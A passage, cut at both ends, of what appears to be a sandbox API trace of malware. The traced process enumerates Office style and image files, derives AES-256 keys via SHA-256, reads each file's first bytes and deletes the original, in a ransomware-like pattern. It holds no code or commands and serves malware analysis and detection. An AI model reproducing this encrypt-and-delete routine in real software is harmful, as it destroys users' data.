"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\softblue.css")) returned 1 [0160.982] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.998] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.998] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.998] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="arrow.png", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="arrow.png", lpUsedDefaultChar=0x0) returned 10 [0160.998] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52568) returned 1 [0160.999] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0160.999] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.999] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d5e8) returned 1 [0160.999] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe5 [0160.999] ReadFile (in: hFile=0x4cc, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0161.000] CryptDestroyHash (hHash=0x284d628) returned 1 [0161.000] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.000] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.001] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\arrow.png" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\arrow.png")) returned 1 [0161.002] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document.gif", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document.gif", lpUsedDefaultChar=0x0) returned 13 [0161.002] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52568) returned 1 [0161.003] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0161.003] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.003] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d5e8) returned 1 [0161.003] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x931 [0161.003] ReadFile (in: hFile=0x4d0, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0161.019] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0161.019] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.019] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.020] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Document.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\document.gif")) returned 1 [0161.021] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Generic.gif", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Generic.gif", lpUsedDefaultChar=0x0) returned 12 [0161.021] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52568) returned 1 [0161.021] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0161.021] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.022] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d5e8) returned 1 [0161.022] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x832 [0161.022] ReadFile (in: hFile=0x4cc, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0161.024] CryptDestroyHash (hHash=0x284d628) returned 1 [0161.024] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.024] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.025] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Generic.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\generic.gif")) returned 1 [0161.026] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gradient.png", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gradient.png", lpUsedDefaultChar=0x0) returned 13 [0161.026] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52568) returned 1 [0161.027] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0161.027] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.027] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d5e8) returned 1 [0161.027] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe2 [0161.027] ReadFile (in: hFile=0x4d0, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0161.028] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0161.028] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.028] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.030] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\gradient.png" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\gradient.png")) returned 1 [0161.030] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Main.gif", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Main.gif", lpUsedDefaultChar=0x0) returned 9 [0161.031] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52568) returned 1 [0161.031] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0161.031] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.031] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d5e8) returned 1 [0161.031] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x634 [0161.031] ReadFile (in: hFile=0x4cc, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0161.034] CryptDestroyHash (hHash=0x284d628) returned 1 [0161.034] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.034] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.036] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Main.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\main.gif")) returned 1 [0161.037] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Person.gif", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Person.gif", lpUsedDefaultChar=0x0) returned 11 [0161.037] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52568) returned 1 [0161.037] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0161.037] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.037] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d5e8) returned 1 [0161.037] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x96a [0161.037] ReadFile (in: hFile=0x4d0, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0161.039] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0161.039] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.039] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.040] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Person.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\person.gif")) returned 1 [0161.041] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Response.gif", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Response.gif", lpUsedDefaultChar=0x0) returned 13 [0161.042] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52568) returned 1 [0161.043] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0161.043] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.043] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d5e8) returned 1 [0161.043] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x68e [0161.043] ReadFile (in: hFile=0x4cc, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0161.060] CryptDestroyHash (hHash=0x284d628) returned 1 [0161.060] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.060] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.061] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Response.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\response.gif")) returned 1 [0161.062] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0161.062] FindClose (in: hFindFile=0x284d668 | out: hFindFile=0x284d668) returned 1 [0161.062] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Solutions.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Solutions.css", lpUsedDefaultChar=0x0) returned 14 [0161.062] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0161.063] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0161.063] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.063] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0161.063] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x19cc [0161.063] ReadFile (in: hFile=0x4a8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0161.118] CryptDestroyHash (hHash=0x284d668) returned 1 [0161.118] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0161.118] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.120] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions.css")) returned 1 [0161.120] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Solutions_Doc.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Solutions_Doc.css", lpUsedDefaultChar=0x0) returned 18 [0161.121] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0161.121] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0161.121] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.121] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0161.121] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf7 [0161.121] ReadFile (in: hFile=0x4d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0161.123] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0161.123] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0161.123] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.124] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions_Doc.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions_doc.css")) returned 1 [0161.125] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Solutions_Generic.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Solutions_Generic.css", lpUsedDefaultChar=0x0) returned 22 [0161.125] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0161.126] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0161.126] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.126] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0161.126] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x55c [0161.126] ReadFile (in: hFile=0x4a8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0161.128] CryptDestroyHash (hHash=0x284d668) returned 1 [0161.128] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0161.128] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.130] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions_Generic.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions_generic.css")) returned 1 [0161.131] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Solutions_Person.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Solutions_Person.css", lpUsedDefaultChar=0x0) returned 21 [0161.132] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0161.132] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0161.132] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.132] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0161.132] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa7 [0161.132] ReadFile (in: hFile=0x4d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0161.134] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0161.134] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0161.134] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.135] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions_Person.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions_person.css")) returned 1 [0161.136] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Solutions_Response.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Solutions_Response.css", lpUsedDefaultChar=0x0) returned 23 [0161.137] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0161.137] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0161.137] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.137] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0161.137] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xab [0161.137] ReadFile (in: hFile=0x4a8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0161.139] CryptDestroyHash (hHash=0x284d668) returned 1 [0161.139] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0161.139] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.140] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions_Response.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions_response.css")) returned 1 [0161.141] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.141] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.141] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.141] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BUTTON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BUTTON.GIF", lpUsedDefaultChar=0x0) returned 11 [0161.141] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_OFF.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_OFF.GIF", lpUsedDefaultChar=0x0) returned 12 [0161.141] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_ON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_ON.GIF", lpUsedDefaultChar=0x0) returned 11 [0161.141] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0161.141] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0161.141] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpringGreen.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpringGreen.css", lpUsedDefaultChar=0x0) returned 16 [0161.142] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0161.142] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0161.142] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.142] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0161.142] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd01 [0161.142] ReadFile (in: hFile=0x4d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0161.145] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0161.145] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0161.145] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.146] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\springgreen.css")) returned 1 [0161.147] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 